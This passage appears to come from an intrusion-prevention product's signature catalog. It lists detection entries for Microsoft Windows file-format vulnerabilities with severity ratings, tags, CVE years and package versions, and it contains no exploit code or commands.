Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-975-5242
Vulnerability: Microsoft-Windows-Graphics-Component-Meta_Setdibtodev-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Component-Remote-Code-Execution

About this situation: An attempt to exploit a Microsoft Windows Graphics Component Remote Code Execution vulnerability detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Graphics Rendering Engine, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-839-5242
Vulnerability: Microsoft-Windows-Graphics-Component-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows RT, Windows 2012, Windows 2008, Any Hardware, MS2013-11, CVE2013, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-550-5211
Vulnerability: Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Device-Interface-EMR_Header-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1173-5242
Vulnerability: Microsoft-Windows-Graphics-Device-Interface-EMR_Header-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Device-Interface-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Vulnerability: Microsoft-Windows-Graphics-Device-Interface-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Device-Interface-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-05, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Vulnerability: Microsoft-Windows-Graphics-Device-Interface-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Device-Interface-Out-Of-Bounds-Access

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-05, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Windows-Graphics-Device-Interface-Out-Of-Bounds-Access
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Rendering-Engine-EMF-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Digital Image Suite detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Visio, Microsoft Office XP, Microsoft SQL Server, Microsoft Office 2003, Microsoft Works, Microsoft PowerPoint Viewer, Microsoft Report Viewer, Microsoft Forefront Client Security, MS2008-09, CVE2008, Windows not specific, Internet Explorer not specific, Microsoft Visio not specific, Microsoft SQL Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Windows-Graphics-Rendering-Engine-EMF-Parsing-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Graphics Rendering Enigine detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP 64-bit, Windows 2003 SP1, Windows Vista, Windows 2003 64-bit, Windows XP 64-bit SP2, Windows 2003 SP2, Windows Vista SP1, Windows 2008, Any Hardware, MS2008-09, CVE2008, Windows XP 64-bit not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-483-5211
Vulnerability: Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF
Description:
Back to top

File-Binary_Microsoft-Windows-GRE-WMF-Handling-Memory-Read-Exception

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-GRE-WMF-Handling-Memory-Read-Exception
Description:
Back to top

File-Binary_Microsoft-Windows-Help-Document

About this situation: Microsoft Windoes help document download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content, Document
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Windows-HLP-File-Handling-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2007, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-HLP-File-Handling-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Image-ICC-Profile-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1104-5242
Vulnerability: Microsoft-Windows-Image-ICC-Profile-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Imaging-API-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1210-5242
Vulnerability: Microsoft-Windows-Imaging-API-Use-After-Free
Description:
Back to top

File-Binary_Microsoft-Windows-Integer-Underflow-CVE-2015-6130

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Any Hardware, MS2015-12, CVE2015, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-711-5211
Vulnerability: Microsoft-Windows-Integer-Underflow-CVE-2015-6130
Description:
Back to top

File-Binary_Microsoft-Windows-Itss.dll-CHM-File-Handling-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: Microsoft-Windows-Itss.dll-CHM-File-Handling-Heap-Corruption
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-0891-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1412-5242
Vulnerability: Microsoft-Windows-Jet-Database-CVE-2019-0891-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1242-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1412-5242
Vulnerability: Microsoft-Windows-Jet-Database-CVE-2019-1242-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1243-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1192-5242
Last changed: sgpkg-ips-1192-5242
Vulnerability: Microsoft-Windows-Jet-Database-CVE-2019-1243-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1249-RCE

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Jet Database Engine detected.
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Jet Database Engine, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Vulnerability: Microsoft-Windows-Jet-Database-CVE-2019-1249-RCE
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1250-RCE

About this situation: An attempt to exploit a vulnerability in icrosoft Windows Jet Database Engine detected.
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Jet Database Engine, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1372-5242
Vulnerability: Microsoft-Windows-Jet-Database-CVE-2019-1250-RCE
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1358-RCE

About this situation: An attempt to exploit a vulnerability in icrosoft Windows Jet Database Engine detected.
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Jet Database Engine, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1372-5242
Vulnerability: Microsoft-Windows-Jet-Database-CVE-2019-1358-RCE
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1359-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in icrosoft Windows Jet Database Engine detected.
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Jet Database Engine, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1372-5242
Vulnerability: Microsoft-Windows-Jet-Database-CVE-2019-1359-Out-Of-Bounds-Write
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1406-Off-By-One

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1255-5242
Last changed: sgpkg-ips-1255-5242
Vulnerability: Microsoft-Windows-Jet-Database-CVE-2019-1406-Off-By-One
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-Engine-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1107-5242
Vulnerability: Microsoft-Windows-Jet-Database-Engine-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-Engine-Createlvsmlocs-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: Microsoft-Windows-Jet-Database-Engine-Createlvsmlocs-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-Engine-CVE-2020-1074-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-09, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1492-5242
Vulnerability: Microsoft-Windows-Jet-Database-Engine-CVE-2020-1074-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Jet-Database-Engine-Physical-Index-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: Microsoft-Windows-Jet-Database-Engine-Physical-Index-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Microsoft-Windows-Kodak-Image-Viewer-Code-Execution

About this situation: Detected an attempt to exploit buffer overflow vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows 2000 SP4, Windows 2003 SP1, Windows XP SP2, Windows 2003 SP2, Any Hardware, MS2007-10, CVE2007, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Libarchive-Execute_Filter_e8-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-01, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Vulnerability: Microsoft-Windows-Libarchive-Execute_Filter_e8-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Libarchive-Run_Filters-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-04, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Vulnerability: Microsoft-Windows-Libarchive-Run_Filters-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-LNK-NTLM-Relay

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1752-5242
Vulnerability: Microsoft-Windows-LNK-NTLM-Relay
Description:
Back to top

File-Binary_Microsoft-Windows-LNK-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1226-5242
Vulnerability: Microsoft-Windows-LNK-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-LNK-Remote-Code-Execution-CVE-2020-1421

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1265-5242
Last changed: sgpkg-ips-1265-5242
Vulnerability: Microsoft-Windows-LNK-Remote-Code-Execution-CVE-2020-1421
Description:
Back to top

File-Binary_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-01, CVE2025, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189
Description:
Back to top

File-Binary_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-01, CVE2025, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219
Description:
Back to top

File-Binary_Microsoft-Windows-Media-ASF-Header-Parsing-Invalid-Free

About this situation: An attempt to exploit a vulnerability in Windows Media Services detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Services, MS2009-09, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: Microsoft-Windows-Media-ASF-Header-Parsing-Invalid-Free
Description:
Back to top

File-Binary_Microsoft-Windows-Media-CVE-2016-0101-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-03, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Microsoft-Windows-Media-CVE-2016-0101-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-JPEG

About this situation: An attempt to exploit ASF file parsing vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Format Runtime x64 Edition, Windows Media Services, MS2007-12, CVE2007, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sig

About this situation: An attempt to exploit ASF file parsing vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Format Runtime x64 Edition, Windows Media Services, MS2007-12, CVE2007, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Spread

About this situation: An attempt to exploit ASF file parsing vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Format Runtime x64 Edition, Windows Media Services, MS2007-12, CVE2007, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sum

About this situation: An attempt to exploit ASF file parsing vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Format Runtime x64 Edition, Windows Media Services, MS2007-12, CVE2007, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Media-Foundation-Mfasfsrcsnk.dll-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: Microsoft-Windows-Media-Foundation-Mfasfsrcsnk.dll-Type-Confusion
Description:
Back to top

File-Binary_Microsoft-Windows-Media-MIDI-File-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-01, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Microsoft-Windows-Media-MIDI-File-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Windows-Media-Playback-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Media Format Runtime detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-09, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Media-Playback-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Windows-Memory-Dump

About this situation: Windos Memory Dump file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content, Miscellaneous File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Windows-Metafile

About this situation: Microsoft Windows Metafile download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content, Media File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Windows-Metafile-Setpalette-Entries-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2005, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Microsoft-Windows-Metafile-Setpalette-Entries-Heap-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Metafile-Vulnerability-MS05-053

About this situation: Detects malformed WMF images that have very large values set as the size of the largest record
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2005-11, CVE2005, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-585-5211
Vulnerability: WMF-Windows-Metafile-Vulnerability-MS05-053
Description:
Back to top

File-Binary_Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows MF3216 Component detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows MF3216, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1684-5242
Last changed: sgpkg-ips-1684-5242
Vulnerability: Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-MIDI-Remote-Code-Execution-Vulnerability

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 10
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2012-01, CVE2012, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-433-4219
Last changed: sgpkg-ips-466-5211
Vulnerability: Microsoft-Windows-MIDI-Remote-Code-Execution-Vulnerability
Description:
Back to top

File-Binary_Microsoft-Windows-MOTW-Security-Feature-Bypass-CVE-2024-30050

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-05, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1726-5242
Last changed: sgpkg-ips-1726-5242
Vulnerability: Microsoft-Windows-MOTW-Security-Feature-Bypass-CVE-2024-30050
Description:
Back to top

File-Binary_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-12, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Vulnerability: Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
Description:
Back to top

File-Binary_Microsoft-Windows-OLE-CVE-2017-8487-Global-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server 2003 detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-945-5242
Last changed: sgpkg-ips-945-5242
Vulnerability: Microsoft-Windows-OLE-CVE-2017-8487-Global-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-OpenType-Compact-Font-Format-BOF

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-02, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Microsoft-Windows-OpenType-Compact-Font-Format-Driver-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-OpenType-Font-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-11, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-833-5242
Last changed: sgpkg-ips-833-5242
Vulnerability: Microsoft-Windows-OpenType-Font-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-407-4219
Vulnerability: Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-10, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-663-5211
Vulnerability: Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426
Description:
Back to top

File-Binary_Microsoft-Windows-Remote-Code-Execution-CVE-2018-8475

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-09, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
